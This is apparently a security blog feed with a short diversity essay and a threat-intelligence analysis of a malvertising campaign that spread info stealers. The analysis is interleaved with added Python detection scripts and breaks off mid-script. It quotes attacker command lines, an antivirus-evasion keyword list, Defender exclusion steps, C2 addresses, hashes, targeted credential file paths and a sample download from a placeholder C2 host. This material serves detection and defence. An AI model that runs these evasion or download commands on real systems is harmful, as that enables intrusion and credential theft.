Women’s History Month: Why different perspectives in cybersecurity and AI matter more than ever before
This Women’s History Month serves as a crucial moment for us to lead and continue to pave the way for a more inclusive future. I am truly honored to support my amazing women colleagues who continue to excel in their careers and am grateful to have so many allies who have extended their hands to help guide and shape me to the person I am today.
Just last week I was in Tokyo for the Japan Security Forum, where Miki Tsusaka, the President of Microsoft Japan, and I had a great conversation during a CyberWomen Asia fireside chat about the importance of women in cybersecurity. Following the chat was a panel discussion with Tsutaki-san, Security leader at Yamaha Motor Corporation, and Debbie Furtado, one of our bright Principal group engineering managers. The event highlighted our different perspectives and talents, which are invaluable for driving innovation and progress across various industries. I am proud to be a part of Microsoft Security, which is focused on building and nurturing an inclusive cybersecurity workforce and curating careers, tools, and resources that work for everyone. We recognize that this promotes business growth, strengthens global defenses, and enhances AI safety.
According to the World Economic Forum, gender equality in entrepreneurship drives economic growth and innovation.[1] McKinsey and Company has also observed that closing the gender gap in employment and entrepreneurship could increase global GDP by 20%, and that organizations with 30% or more women on executive teams are 27% more likely to achieve higher profitability.[2]
For a better future we need everyone on the journey, and this is particularly significant in cybersecurity, where we face a critical shortage of talent and where cyberthreat actors come from diverse backgrounds.
Addressing the skills gap in cybersecurity and AI
There is a significant talent gap in cybersecurity. The 2024 ISC2 Cybersecurity Workforce Study reports a global shortage of 4.7 million skilled workers.[3] This worker shortage has been a significant challenge over the past 12 months and is expected to continue for the next two years. To address this growing concern, we must embrace a wide range of perspectives and backgrounds to foster innovation and find more effective solutions to these challenges.
By incorporating individuals with varied perspectives, experiences, and approaches within the cybersecurity workforce, we can enhance problem-solving capabilities and enhance strategic defenses.
Cybercriminals come from various cultures and backgrounds, bringing different perspectives. Security professionals with varied backgrounds and perspectives can provide creative approaches and unique insights to counter these cyberthreats. Likewise, for AI, having different backgrounds and perspectives helps with AI safety and bias.
Continue to deepen expertise and invite different perspectives
While progress has been made in creating opportunities for women in cybersecurity, significant work remains to remove entry barriers. It is essential to continue our efforts to improve representation in cybersecurity by creating new pathways and gaining support from more allies. I wholeheartedly encourage you to actively contribute to this objective through the many organizations and programs available and by doing the following:
- Share the accomplishments of meaningful role models with a wide range of experiences and perspectives.
- Adjust job requirements to remove potential biases.
- Offer inclusive training that encourages professionals, particularly those early in their careers, to advance their skills in cybersecurity.
- Volunteer for educational programs that include cybersecurity and AI training.
- Reach out to community groups that advocate for mentorship opportunities.
- Act as an ally and create opportunities for those interested in cybersecurity careers, such as by encouraging them to participate and speak up and introducing them to peers.
Security should be for all and we are all in this together. Together, we can enhance the global security workforce and contribute to a promising future.
Register for our upcoming panel “Harnessing Diversity – Strengthening the Cybersecurity Workforce in the Age of AI” and visit Microsoft’s cybersecurity awareness page for resources and training provided by Microsoft security experts, enabling everyone in your organization to become a cyber defender. Let us all acknowledge the importance of diversity in cybersecurity and its critical role in safeguarding our future and shaping a history we can be proud of.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
[1] Advancing gender parity in entrepreneurship: strategies for a more equitable future, World Economic Forum. January 20, 2025.
[2] Diversity matters even more: The case for holistic impact, McKinsey and Company. December 5, 2023.
[3] 2024 ISC2 Cybersecurity Workforce Study, ISC2. October 31, 2024.
The post Women’s History Month: Why different perspectives in cybersecurity and AI matter more than ever before appeared first on Microsoft Security Blog.
Malvertising campaign leads to info stealers hosted on GitHub
In early December 2024, Microsoft Threat Intelligence detected a large-scale malvertising campaign that impacted nearly one million devices globally in an opportunistic attack to steal information. The attack originated from illegal streaming websites embedded with malvertising redirectors, leading to an intermediary website where the user was then redirected to GitHub and two other platforms. The campaign impacted a wide range of organizations and industries, including both consumer and enterprise devices, highlighting the indiscriminate nature of the attack.
GitHub was the primary platform used in the delivery of the initial access payloads and is referenced throughout this blog post; however, Microsoft Threat Intelligence also observed one payload hosted on Discord and another hosted on Dropbox.
The GitHub repositories, which were taken down, stored malware used to deploy additional malicious files and scripts. Once the initial malware from GitHub gained a foothold on the device, the additional files deployed had a modular and multi-stage approach to payload delivery, execution, and persistence. The files were used to collect system information and to set up further malware and scripts to exfiltrate documents and data from the compromised host. This activity is tracked under the umbrella name Storm-0408 that we use to track numerous threat actors associated with remote access or information-stealing malware and who use phishing, search engine optimization (SEO), or malvertising campaigns to distribute malicious payloads.
In this blog, we provide our analysis of this large-scale malvertising campaign, detailing our findings regarding the redirection chain and various payloads used across the multi-stage attack chain. We further provide recommendations for mitigating the impact of this threat, detection details, indicators of compromise (IOCs), and hunting guidance to locate related activity. By sharing this research, we aim to raise awareness about the tactics, techniques, and procedures (TTPs) used in this widespread activity so organizations can better prepare and implement effective mitigation strategies to protect their systems and data.
We would like to thank the GitHub security team for their prompt response and collaboration in taking down the malicious repositories.
GitHub activity and redirection chain
Since at least early December 2024, multiple hosts downloaded first-stage payloads from malicious GitHub repositories. The users were redirected to GitHub through a series of other redirections. Analysis of the redirector chain determined the attack likely originated from illegal streaming websites where users can watch pirated videos. The streaming websites embedded malvertising redirectors within movie frames to generate pay-per-view or pay-per-click revenue from malvertising platforms. These redirectors subsequently routed traffic through one or two additional malicious redirectors, ultimately leading to another website, such as a malware or tech support scam website, which then redirected to GitHub.
Multiple stages of malware were deployed in this campaign, as listed below; which later stages of activity occurred depended on the payload dropped during the second stage.
- The first-stage payload that was hosted on GitHub served as the dropper for the next stage of payloads.
- The second-stage files were used to conduct system discovery and to exfiltrate system information that was Base64-encoded into the URL and sent over HTTP to an IP address. The information collected included data on memory size, graphic details, screen resolution, operating system (OS), and user paths.
- Various third-stage payloads were deployed depending on the second-stage payload. In general, the third-stage payload conducted additional malicious activities such as command and control (C2) to download additional files and to exfiltrate data, as well as defense evasion techniques.
The full redirect chain was composed of four to five layers. Microsoft researchers determined malvertising redirectors were contained within an iframe on illegal streaming websites.
Figure 1. Code from website of streaming video and iframe showing malvertising redirector URL
There were several redirections that occurred before arriving at the malicious content stored on GitHub.
Figure 2. Redirection chain from pirate streaming website to malware files on GitHub
Attack chain
Once the redirection to GitHub occurred, the malware hosted on GitHub established the initial foothold on the user’s device and functioned as a dropper for additional payload stages and for running malicious code. The additional payloads included information stealers to collect system and browser information on the compromised device, most of which were either Lumma stealer or an updated version of Doenerium. Depending on the initial payload, NetSupport, a remote monitoring and management (RMM) tool, was also often deployed alongside the infostealer. Besides the information stealers, PowerShell, JavaScript, VBScript, and AutoIT scripts were run on the host. The threat actors incorporated use of living-off-the-land binaries and scripts (LOLBAS) like PowerShell.exe, MSBuild.exe, and RegAsm.exe for C2 and for exfiltration of user data and browser credentials.
After the initial foothold was gained, the activity led to a modular and multi-stage approach to payload delivery, execution, and persistence. Each stage dropped another payload with a different function, as outlined below. Actions conducted across these stages include system discovery (memory, GPU, OS, signed-in users, and others), opening browser credential files, Data Protection API (DPAPI) crypt data calls, and other functions such as obfuscated script execution and named pipe creations to conduct data exfiltration. Persistence was achieved through modification of the registry run keys and the addition of a shortcut file to the Windows Startup folder.
Several stages of malicious activity to conduct deployment of additional malware, collections, and exfiltration of data to a C2 were observed. While not every single initial payload followed these exact steps, this is an overall view of what occurred across most incidents analyzed:
Figure 3. General depiction of the four stages
First-stage payload: Establishing a foothold on the host
During the first stage, a payload is dropped onto the user’s device from the binary hosted on GitHub, establishing a foothold on that device. As of mid-January 2025, the first-stage payloads discovered were digitally signed with a newly created certificate. A total of twelve different certificates were identified, all of which have been revoked.
Most of these initial payloads dropped the following legitimate files to leverage their functionality. These files were either leveraged by the first-stage payload or by later-stage payloads, depending on the actions being conducted.
| File name | Function |
| --- | --- |
| app-64.7z | This is a compressed archive that stores the second-stage payload and additional dropped files. |
| app.asar | This is an archive file specific to Electron applications, which are directly installed programs. |
| d3dcompiler_47.dll | This file is often included in DirectX redistributables, which are commonly bundled with Microsoft installers for games and graphics applications. |
| elevate.exe | This file is used by various installers and scripts to run processes with elevated privileges, not specific to Microsoft. |
| ffmpeg.dll | This file is associated with FFmpeg, a popular multimedia framework used to handle video, audio, and other multimedia files and streams. |
| libEGL.dll | This file is part of the ANGLE project, which is often found in applications that use OpenGL Embedded Systems (ES), including some web browsers and games. |
| libEGLESv2.dll | This file is part of the ANGLE project, which is often found in applications that use OpenGL ES, including some web browsers and games. |
| LICENSES.chromium.html | This file could contain information about the system or browser. |
| nsis7z.dll | This file is associated with the plugins for the Nullsoft Scriptable Install System (NSIS), which is used to create installers for various software. |
| StdUtils.dll | This file is associated with the plugins for the NSIS. |
| System.dll | This file is part of the .NET Framework assembly, typically included in Microsoft installers for applications that rely on the .NET Framework. |
| vk_swiftshader.dll | This file is associated with SwiftShader, which is used in applications that need a CPU-based implementation of the Vulkan API. |
| vulkan-1.dll | This file is associated with applications that use the Vulkan Graphics API, such as games and graphics software. |
Depending on the first-stage payload that was initially established on the compromised device, Microsoft observed different second-stage payloads and several different methods for delivering these payloads to the device.
Second-stage payload: System discovery, collection, and exfiltration
The main purpose of the second-stage payload is to conduct system discovery and collect that data for exfiltration to the C2. The system information collected includes data such as memory size, graphic card details, screen resolution, operating system, user paths, and a reference to the second-stage payload’s file name.
This was accomplished by querying the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName for the Windows OS version and running commands, such as the echo command, to gather the device’s name (%COMPUTERNAME%) and domain name (%USERDOMAIN%).
System data collected by the second-stage payload is Base64-encoded and exfiltrated as a query parameter to an IP address.
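As an added example (not code from the original post or from Microsoft), the following Python scans proxy-style log lines for the pattern described above: an HTTP request to a bare IP address whose query string carries a long Base64 token that decodes to system-fingerprint fields. The log layout, the fingerprint field order, and the 203.0.113.10 and 198.51.100.7 addresses are constructed for the example; the keyword patterns only illustrate the categories of data the post says were collected.

```python
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit

# Constructed device fingerprint. The field layout is an assumption; the blog
# only states that memory, GPU, resolution, OS and user-path data are
# Base64-encoded into a query parameter sent over HTTP to an IP address.
FINGERPRINT = "Windows 10 Pro|8192MB|NVIDIA GeForce RTX 3060|1920x1080|C:\\Users\\alice|Ionixnignx.exe"
ENCODED = quote(base64.b64encode(FINGERPRINT.encode()).decode(), safe="")
# A long but harmless Base64 value, to show the keyword step rejects ordinary tokens.
BENIGN = quote(base64.b64encode(b"a perfectly ordinary opaque session token value").decode(), safe="")

# Constructed proxy log lines in a hypothetical "timestamp client method url" layout.
# 203.0.113.10 and 198.51.100.7 are documentation addresses, not IOCs from the post.
SAMPLE_LOG = f"""\
2024-12-03T10:14:02Z 10.0.0.15 GET http://203.0.113.10/?data={ENCODED}
2024-12-03T10:14:05Z 10.0.0.15 GET https://www.example.com/search?q=hello
2024-12-03T10:15:11Z 10.0.0.22 GET http://198.51.100.7/api?token={BENIGN}
"""

IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/_-]{32,}={0,2}$")
# Categories of fingerprint data named in the post; the regexes are illustrative.
FINGERPRINT_PATTERNS = {
    "os": re.compile(r"\bWindows\b", re.I),
    "memory": re.compile(r"\b\d{3,6}\s?(?:MB|GB)\b", re.I),
    "resolution": re.compile(r"\b\d{3,4}x\d{3,4}\b"),
    "user_path": re.compile(r"[A-Za-z]:\\Users\\", re.I),
    "gpu": re.compile(r"\b(?:NVIDIA|GeForce|Radeon|Intel)\b", re.I),
}


def decode_b64(token):
    """Decode standard or URL-safe Base64, tolerating stripped padding.
    Returns the text only if it is (almost) entirely printable."""
    std = token.replace("-", "+").replace("_", "/")
    try:
        raw = base64.b64decode(std + "=" * (-len(std) % 4))
    except ValueError:
        return None
    text = raw.decode("utf-8", errors="replace")
    if not text or sum(ch.isprintable() for ch in text) / len(text) < 0.9:
        return None
    return text


def scan_line(line):
    """Return a finding if the line looks like fingerprint exfiltration, else None."""
    parts = line.split()
    if len(parts) < 4:
        return None
    timestamp, client, _method, url = parts[:4]
    u = urlsplit(url)
    if u.scheme != "http" or not IPV4_HOST.match(u.hostname or ""):
        return None  # the campaign posted to a bare IP address over plain HTTP
    for name, values in parse_qs(u.query).items():
        for value in values:
            value = value.replace(" ", "+")  # undo '+' -> ' ' if the sender did not percent-encode
            if not B64_TOKEN.match(value):
                continue
            text = decode_b64(value)
            if text is None:
                continue
            fields = [k for k, pat in FINGERPRINT_PATTERNS.items() if pat.search(text)]
            if len(fields) >= 2:  # two independent fingerprint categories in one token
                return {"timestamp": timestamp, "client": client, "dest": u.hostname,
                        "param": name, "fields": fields, "decoded": text}
    return None


def scan_log(text):
    """Scan every line of a log and return the findings."""
    return [f for f in map(scan_line, text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['client']} -> {f['dest']} ?{f['param']}= fields={f['fields']}")
```

The bare-IP and plain-HTTP conditions are deliberately narrow so the rule stays quiet on ordinary traffic; loosen them only after checking how many internal services in your environment are reached by IP.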
Figure 4. Typical format of the URL observed when exfiltrating information collected from the compromised device
Third-stage payload: PowerShell and .exe binary
Depending on the second-stage payload, either one or multiple executables are dropped onto the compromised device, and sometimes an accompanying encoded PowerShell script. These files initiate a chain of events that conduct command execution, payload delivery, defensive evasion, persistence, C2 communications, and data exfiltration. The analysis of the dropped executables is first discussed below, followed by review of the PowerShell scripts observed.
Third-stage .exe analysis
The second-stage payloads run the dropped third-stage executables using the command prompt (for example, cmd.exe /d /s /c ""C:\Users\<user>\AppData\Local\Temp\ApproachAllan.exe""). The /c flag ensures that the command runs and exits quickly. When the third-stage .exe runs, it drops a command file (.cmd) and launches it using the command prompt (for example, "cmd.exe" /c copy Beauty Beauty.cmd && Beauty.cmd). The .cmd file performs several actions, such as running tasklist to initiate the discovery of running programs, followed by findstr to search for keywords associated with security software:
| findstr keyword | Associated software |
| --- | --- |
| wrsa | Webroot SecureAnywhere |
| opssvc | Quick Heal |
| AvastUI | Avast Antivirus |
| AVGUI | AVG Antivirus |
| bdservicehost | Bitdefender Antivirus |
| nsWscSvc | Norton Security |
| ekrn | ESET |
| SophosHealth | Sophos |
The .cmd file also concatenates multiple files into one with a single-character file name: "cmd /c copy /b ..\Verzeichnis + ..\Controlling + ..\Constitute + ..\Enjoyed + ..\Confusion + ..\Min +..\Statutory J". This single-character file name is used next.
Following this, the third-stage .exe produces an AutoIT v3 interpreter file that is renamed from the typical file name of AutoIt3.exe and uses a .com file extension. The .cmd file initiates the execution of the .com file against the single-character binary (such as Briefly.com J). Note that most of the second-stage payloads follow this progression chain and, as mentioned, a second-stage payload can also drop multiple executables, all following the same process. For example:
First stage
- X-essentiApp.exe
Second stage
- Ionixnignx.exe
Third stage
- EverybodyViewing.exe
- ReliefOrganizational.exe
- InflationWinston.exe
Third-stage command files
- Beauty.cmd
- Possess.cmd
- Villa.cmd
Fourth-stage AutoIT .com files
- Alexandria.com
- Kills.com
- Briefly.com
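The .cmd-stage behaviours above (tasklist piped to findstr with the keyword table, copy /b concatenation into a one-character file, and the renamed AutoIt .com interpreter launched against that file) can be expressed as process-creation rules. The Python below is an added example, not Microsoft's detection logic; the event records are constructed in a hypothetical EDR export layout, with command lines modelled on the ones quoted in the post.

```python
import re

# findstr keyword -> product, taken from the post's table of security software checks.
AV_KEYWORDS = {
    "wrsa": "Webroot SecureAnywhere",
    "opssvc": "Quick Heal",
    "AvastUI": "Avast Antivirus",
    "AVGUI": "AVG Antivirus",
    "bdservicehost": "Bitdefender Antivirus",
    "nsWscSvc": "Norton Security",
    "ekrn": "ESET",
    "SophosHealth": "Sophos",
}

# Constructed process-creation events. The field names are a hypothetical EDR
# export; the command lines mirror the ones quoted in the post.
SAMPLE_EVENTS = [
    {"parent": "Beauty.cmd", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c tasklist | findstr /I "wrsa opssvc AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"'},
    {"parent": "Beauty.cmd", "image": "cmd.exe",
     "cmdline": "cmd /c copy /b ..\\Verzeichnis + ..\\Controlling + ..\\Constitute + ..\\Enjoyed + ..\\Confusion + ..\\Min +..\\Statutory J"},
    {"parent": "Beauty.cmd", "image": "Briefly.com", "cmdline": "Briefly.com J"},
    {"parent": "explorer.exe", "image": "cmd.exe", "cmdline": 'cmd.exe /c tasklist | findstr /I "chrome"'},
    {"parent": "setup.exe", "image": "cmd.exe", "cmdline": "cmd /c copy /b part1.bin + part2.bin full.bin"},
]

COPY_B = re.compile(r"\bcopy\s+/b\s+(.+)$", re.I)


def detect_av_discovery(cmdline):
    """Flag findstr invocations that probe for two or more known security products."""
    if "findstr" not in cmdline.lower():
        return None
    hits = [product for kw, product in AV_KEYWORDS.items()
            if re.search(r"\b" + re.escape(kw) + r"\b", cmdline, re.I)]
    return hits if len(hits) >= 2 else None


def detect_binary_concat(cmdline):
    """Flag 'copy /b a + b + c ... X' that rebuilds a staged binary under a one-character name."""
    m = COPY_B.search(cmdline)
    if not m:
        return None
    chunks = [c.strip() for c in m.group(1).split("+")]
    tail = chunks[-1].split()          # last chunk holds "<last source> <target>"
    if len(tail) < 2:
        return None
    target = tail[-1]
    sources = chunks[:-1] + [" ".join(tail[:-1])]
    stem = target.rsplit("\\", 1)[-1].split(".")[0]
    if len(sources) >= 3 and len(stem) == 1:
        return {"sources": sources, "target": target}
    return None


def detect_com_launcher(event):
    """Flag a .com image (a renamed AutoIt interpreter in this campaign) run against a one-character file."""
    image = event["image"].lower()
    args = event["cmdline"].split()[1:]
    if image.endswith(".com") and any(len(a) == 1 for a in args):
        return {"image": event["image"], "args": args}
    return None


def triage(events):
    """Return (index, verdict, detail) for every event that matches a rule."""
    findings = []
    for i, ev in enumerate(events):
        av = detect_av_discovery(ev["cmdline"])
        if av:
            findings.append((i, "security-software discovery", av))
        cat = detect_binary_concat(ev["cmdline"])
        if cat:
            findings.append((i, "staged binary concatenation", cat))
        com = detect_com_launcher(ev)
        if com:
            findings.append((i, "renamed interpreter launch", com))
    return findings


if __name__ == "__main__":
    for index, verdict, detail in triage(SAMPLE_EVENTS):
        print(f"event {index}: {verdict} -> {detail}")
```

Each rule on its own is weak (installers also use copy /b; admins run findstr), which is why the three are reported with the shared parent so an analyst can see them as one chain rather than three unrelated alerts.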
We observed multiple .com files originating from different dropped executables, each performing distinct functions while occasionally overlapping in behavior. These files facilitate persistence, process injection, remote debugging, and data exfiltration through various mechanisms. One .com file, such as Alexandria.com, drops a .scr file (another renamed AutoIT interpreter), and a .js (JavaScript) file with the same name as the .scr file. The purpose of the JavaScript file is to ensure persistence by creating a .url internet shortcut that points to the JavaScript file and is placed in the Startup folder, ensuring that the .scr file executes when the .js file executes (through Wscript.exe) upon user sign-in. Alternatively, persistence can be achieved using scheduled task creation. The .scr file can initiate C2 connections, enable remote debugging on Chrome or Edge within a hidden desktop session, or create TCP listening sockets on ports 9220-9229. This functionality allows threat actors to monitor browsing activity and interact with an active browser instance. These files can also open sensitive data files, indicating their role in facilitating post-exploitation activities.
Another .com file, such as affiliated.com, also focuses on remote debugging and browser monitoring. In addition to remote monitoring, affiliated.com initiates network connections to Telegram, Let’s Encrypt, and threat actor domains, potentially for C2 or exfiltration. It also accesses DPAPI to decrypt sensitive stored credentials and retrieve browser data.
The final observed .com file, such as Briefly.com, exhibits behavior similar to affiliated.com but extends its capabilities to include screenshot capture, data exfiltration, and PowerShell-based execution. This file accesses browser and user data for collection, establishes connections to Pastebin and additional C2 domains, and drops the fourth-stage PowerShell script.
The order in which these .com files run is not strictly defined, as one or multiple files can perform overlapping functions depending on the third-stage payload. In many cases, the .com files also leverage LOLBAS like RegAsm.exe by dropping a legitimate file into the %TEMP% directory or injecting malicious code into it using NtAllocateVirtualMemory and SetThreadContext API function calls. RegAsm.exe is used to establish C2 connections over TCP ports 15647 or 9000, exfiltrating data, accessing DPAPI for decryption, monitoring keystrokes using the WH_KEYBOARD_LL hook, and more. This flexibility in execution allows threat actors to tailor their approach based on environmental factors, such as security configurations and user activity.
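As an added example (not from the post), three host checks in Python that correspond to the .com-file behaviours just described: Startup-folder .url shortcuts that launch a local script file, listening sockets in the 9220-9229 range owned by something other than a browser, and Chrome or Edge started with the remote-debugging switch. The sample Startup entries, socket table and command lines are constructed; Alexandria.js is a hypothetical name chosen because the post says the .js shares the name of the dropped .scr.

```python
import re
from urllib.parse import unquote, urlsplit

SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1", ".scr", ".com", ".bat", ".cmd"}
DEBUG_PORTS = range(9220, 9230)   # 9220-9229, the listener range named in the post
BROWSERS = {"chrome.exe", "msedge.exe"}

# Constructed Startup-folder contents: file name -> file text. Alexandria.js is a
# hypothetical name; the post says the .js shares the name of the dropped .scr.
SAMPLE_STARTUP = {
    "Alexandria.url": "[InternetShortcut]\r\nURL=file:///C:/Users/alice/AppData/Local/Temp/Alexandria.js\r\n",
    "Teams.url": "[InternetShortcut]\r\nURL=https://teams.microsoft.com/\r\n",
    "notes.txt": "remember to file expenses\r\n",
}

# Constructed listening-socket inventory: (local address, port, owning image, pid).
SAMPLE_LISTENERS = [
    ("127.0.0.1", 9222, "Alexandria.scr", 4120),
    ("127.0.0.1", 9229, "Alexandria.scr", 4120),
    ("0.0.0.0", 445, "System", 4),
]

# Constructed browser command lines.
SAMPLE_BROWSER_CMDLINES = [
    '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9222 '
    '--user-data-dir="C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\User Data"',
    '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --profile-directory=Default',
]


def parse_url_shortcut(text):
    """Return the URL= target of an [InternetShortcut] file, or None."""
    for line in text.splitlines():
        key, _, value = line.partition("=")
        if key.strip().lower() == "url":
            return value.strip()
    return None


def check_startup_entry(name, text):
    """Flag Startup items that are scripts, or .url shortcuts that point at local scripts."""
    ext = ("." + name.rsplit(".", 1)[-1]).lower() if "." in name else ""
    if ext in SCRIPT_EXTS:
        return {"file": name, "reason": "script placed directly in Startup"}
    if ext == ".url":
        target = parse_url_shortcut(text)
        if target:
            u = urlsplit(target)
            path = unquote(u.path).lower()
            if u.scheme in ("file", "") and any(path.endswith(e) for e in SCRIPT_EXTS):
                return {"file": name, "reason": "shortcut launches a local script", "target": target}
    return None


def check_listeners(listeners):
    """Flag listeners on 9220-9229 that are not owned by a browser process."""
    return [{"port": port, "image": image, "pid": pid}
            for _addr, port, image, pid in listeners
            if port in DEBUG_PORTS and image.lower() not in BROWSERS]


def check_browser_cmdlines(cmdlines):
    """Flag Chrome/Edge started with the remote-debugging switch."""
    out = []
    for c in cmdlines:
        m = re.search(r"--remote-debugging-port=(\d+)", c)
        if m and any(b in c.lower() for b in BROWSERS):
            out.append({"port": int(m.group(1)), "cmdline": c})
    return out


def run_checks():
    """Apply all three checks to the constructed samples."""
    return {
        "startup": [f for f in (check_startup_entry(n, t) for n, t in SAMPLE_STARTUP.items()) if f],
        "listeners": check_listeners(SAMPLE_LISTENERS),
        "browsers": check_browser_cmdlines(SAMPLE_BROWSER_CMDLINES),
    }


if __name__ == "__main__":
    for category, findings in run_checks().items():
        for f in findings:
            print(f"[{category}] {f}")
```

Developers do start browsers with --remote-debugging-port, so the browser check is best scoped to hosts or users where that is not expected; the listener check is the stronger signal, since a non-browser process owning a port in that range has no legitimate reason to do so.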
Browser data files seen accessed:
- \AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\cookies.sqlite
- \AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\formhistory.sqlite
- \AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\key4.db
- \AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\logins.json
- \AppData\Local\Google\Chrome\User Data\Default\Web Data
- \AppData\Local\Google\Chrome\User Data\Default\Login Data
- \AppData\Local\Microsoft\Edge\User Data\Default\Login Data
User data file paths seen accessed:
- C:\Users\<user>\OneDrive
- C:\Users\<user>\Documents
- C:\Users\<user>\Downloads
If a PowerShell script is also dropped by the second-stage payload, it includes Base64-obfuscated commands to conduct actions such as using curl to download additional files like NetSupport from the C2, creating persistence for the NetSupport RAT, and exfiltrating system information to C2 servers. To ensure that no errors or progress meter are displayed on the compromised device, the curl command is often used with the --silent option when downloading files from the C2. PowerShell is often configured to run without restrictions with the -ExecutionPolicy Bypass parameter.
As an example, in some of the incidents, when the second-stage payload runs, a PowerShell script is dropped and executed. The script sends the compromised device’s name to the C2 and downloads NetSupport RAT from the same C2.
- Second-stage payload: Squarel.exe
- PowerShell script: SHA-256: d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb
- C2 domain: keikochio[.]com
- NetSupport RAT: SHA-256: 32a828e2060e92b799829a12e3e87730e9a88ecfa65a4fc4700bdcc57a52d995
In another case, a second-stage payload drops a PowerShell script that connects to hxxps://ipinfo[.]io to gather the compromised device’s external-facing IP address. The script sends this information to a Telegram chat, then drops presentationhost.exe (a renamed NetSupport binary) and remcmdstub.exe (NetSupport Command Manager) into the %TEMP% directory. Finally, the PowerShell script establishes persistence for presentationhost.exe by adding it to the auto-start extensibility points (ASEP) registry keys. When it runs, the NetSupport RAT connects to the C2 and captures a screenshot of the compromised device’s desktop. It also delivers a Lumma executable that drops a VBScript file with the same name. The VBScript file runs encoded PowerShell to initiate C2 connections and launches MSBuild.exe to enable Chrome remote debugging on a hidden desktop. Additionally, presentationhost.exe initiates remcmdstub.exe, which leverages iScrPaint.exe (iTop Screen Recorder) to run MSBuild.exe and access browser credential files for exfiltration. The iScrPaint.exe file also establishes persistence by placing a .lnk shortcut in the Windows Startup folder, ensuring it runs on system reboot.
- Second-stage payload: Application.exe
- PowerShell script: SHA-256: 483796a64f004a684a7bc20c1ddd5c671b41a808bc77634112e1703052666a64
- C2: hxxp://5.10.250[.]240/fakeurl.htm
The last observed third-stage PowerShell script was dropped by three second-stage payloads. The script sends the compromised device’s name to the C2 server. It then changes the working directory to $env:APPDATA before using Start-BitsTransfer to download NetSupport from the C2. To evade detection, it modifies system security settings, forcing TLS 1.2 for encrypted C2 communication. The downloaded files are extracted into a newly created WinLibraryClient directory under AppData and then launched. The script establishes persistence for client32.exe (the NetSupport RAT) by modifying the ASEP registry keys. Client32.exe initiates C2 connections to hxxp://79.132.128[.]77/fakeurl.htm.
- Second-stage payloads: SalmonSamurai.exe, LakerBaker.exe, and DisplayPhotoViewer.exe
- PowerShell script: SHA-256: 670218cfc5c16d06762b6bc74cda4902087d812e72c52d6b9077c4c4164856b6
- C2 domain: stocktemplates[.]net
Additionally, one observed execution included registry enumeration of HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\ to identify installed applications and security software. It also queries the system’s domain status using Windows Management Instrumentation (WMI) and scans for cryptocurrency wallets, including Ledger Live, Trezor Suite, KeepKey, BCVault, OneKey, and BitBox, indicating potential financial data theft.
Fourth-stage PowerShell analysis
Depending on the .com file that ran (like Briefly.com), the renamed AutoIT file may drop a PowerShell script (SHA-256: 2a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3). The obfuscated PowerShell code uses the Add-MpPreference cmdlet to add exclusion paths to Microsoft Defender so that the specified folders are not scanned.
Figure 5. Deobfuscated commands to add exclusion paths to Windows Defender
The script above is sometimes followed by an instance of Base64-encoded PowerShell commands. These PowerShell commands perform the following actions:
- Sends a web request to hxxps://360[.]net and closes the response.
- Sends a web request to hxxps://baidu[.]com and closes the response.
- Downloads data from hxxps://klipcatepiu0[.]shop/int_clp_sha.txt using a web client.
- Writes the downloaded data to a memory stream and saves it as a .zip file named null.zip (SHA-256: f07b8e5622598c228bfc9bff50838a3c4fffd88c436a7ef77e6214a40b0a2bae) in the C:\Users\<Username>\AppData\Local\Temp directory.
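An added example (not the post's code) of triaging a PowerShell command line of the kind described in the third- and fourth-stage sections above: it decodes -EncodedCommand (Base64 over UTF-16LE) and reports which of the described behaviours appear, such as -ExecutionPolicy Bypass, curl --silent, Start-BitsTransfer, Run-key persistence and Add-MpPreference exclusions. The sample script is constructed; c2.invalid is a placeholder host, and the exact cmdlet syntax for the Run-key and TLS settings is an assumption, since the post names the behaviours rather than the commands.

```python
import base64
import re

# Indicator patterns drawn from the behaviours described in the post. The exact
# PowerShell phrasing (Set-ItemProperty on the Run key, the ServicePointManager
# TLS setting) is an assumption; the post names the behaviours, not the syntax.
INDICATORS = [
    ("execution_policy_bypass", re.compile(r"-ExecutionPolicy\s+Bypass", re.I)),
    ("curl_silent_download", re.compile(r"\bcurl(?:\.exe)?\b[^|\n]*(?:--silent|\s-s\b)", re.I)),
    ("bits_transfer", re.compile(r"\bStart-BitsTransfer\b", re.I)),
    ("defender_exclusion", re.compile(r"\bAdd-MpPreference\b[^\n]*-ExclusionPath", re.I)),
    ("run_key_persistence", re.compile(r"CurrentVersion\\Run\b", re.I)),
    ("external_ip_lookup", re.compile(r"\bipinfo\.io\b", re.I)),
    ("telegram_api", re.compile(r"\bapi\.telegram\.org\b", re.I)),
    ("tls12_forced", re.compile(r"SecurityProtocol[^\n]*Tls12", re.I)),
]

# -EncodedCommand and its documented short forms (-enc, -ec, -e).
ENCODED_ARG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed script modelled on the third-stage behaviour described in the post.
# c2.invalid is a placeholder host (reserved TLD), not an IOC from the post.
SAMPLE_SCRIPT = (
    "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\n"
    "Set-Location $env:APPDATA\n"
    "Start-BitsTransfer -Source http://c2.invalid/client.zip -Destination client.zip\n"
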